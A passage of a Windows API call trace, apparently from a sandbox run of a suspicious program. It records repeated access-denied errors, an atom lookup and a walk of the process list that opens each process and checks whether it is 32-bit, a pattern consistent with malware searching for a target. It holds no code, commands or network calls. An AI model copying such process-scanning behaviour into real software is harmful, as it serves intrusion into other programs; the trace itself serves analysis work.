	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.504] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.505] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetLastError () returned 0x5
	[0084.506] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.506] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.507] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.507] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.507] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.507] CloseHandle (hObject=0x67c) returned 1
	[0084.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x67c
	[0084.507] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.507] CloseHandle (hObject=0x67c) returned 1
	[0084.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397ea88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e30) returned 0xc0000004
	[0084.761] VirtualAlloc (lpAddress=0x0, dwSize=0x16f30, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x16f30, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e9b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397eaa0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c7c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x67c
	[0084.768] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.768] CloseHandle (hObject=0x67c) returned 1
	[0084.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396e7f0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x67c
	[0084.769] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.769] CloseHandle (hObject=0x67c) returned 1
	[0084.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396ea50, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x67c
	[0084.770] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.770] CloseHandle (hObject=0x67c) returned 1
	[0084.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x67c
	[0084.770] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.770] CloseHandle (hObject=0x67c) returned 1
	[0084.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x67c
	[0084.770] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.770] CloseHandle (hObject=0x67c) returned 1
	[0084.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e9b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x67c
	[0084.770] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.771] CloseHandle (hObject=0x67c) returned 1
	[0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396eb30, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x67c
	[0084.771] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.771] CloseHandle (hObject=0x67c) returned 1
	[0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x67c
	[0084.771] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.771] CloseHandle (hObject=0x67c) returned 1
	[0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x67c
	[0084.772] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.772] CloseHandle (hObject=0x67c) returned 1
	[0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x67c
	[0084.772] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.772] CloseHandle (hObject=0x67c) returned 1
	[0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x67c
	[0084.772] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.772] CloseHandle (hObject=0x67c) returned 1
	[0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396e930, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x67c
	[0084.773] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.773] CloseHandle (hObject=0x67c) returned 1
	[0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x67c
	[0084.773] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.773] CloseHandle (hObject=0x67c) returned 1
	[0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c780, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x67c
	[0084.773] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.773] CloseHandle (hObject=0x67c) returned 1
	[0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e7f0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x67c
	[0084.774] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.774] CloseHandle (hObject=0x67c) returned 1
	[0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a1bc8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x67c
	[0084.774] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.774] CloseHandle (hObject=0x67c) returned 1
	[0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x67c
	[0084.774] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.774] CloseHandle (hObject=0x67c) returned 1
	[0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397eaa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x67c
	[0084.774] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.774] CloseHandle (hObject=0x67c) returned 1
	[0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x67c
	[0084.775] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.775] CloseHandle (hObject=0x67c) returned 1
	[0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396ea50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x67c
	[0084.775] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.775] CloseHandle (hObject=0x67c) returned 1
	[0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396e8b0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x67c
	[0084.775] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.775] CloseHandle (hObject=0x67c) returned 1
	[0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e9b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x67c
	[0084.775] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.776] CloseHandle (hObject=0x67c) returned 1
	[0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x67c
	[0084.776] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.776] CloseHandle (hObject=0x67c) returned 1
	[0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1b78, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x67c
	[0084.776] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
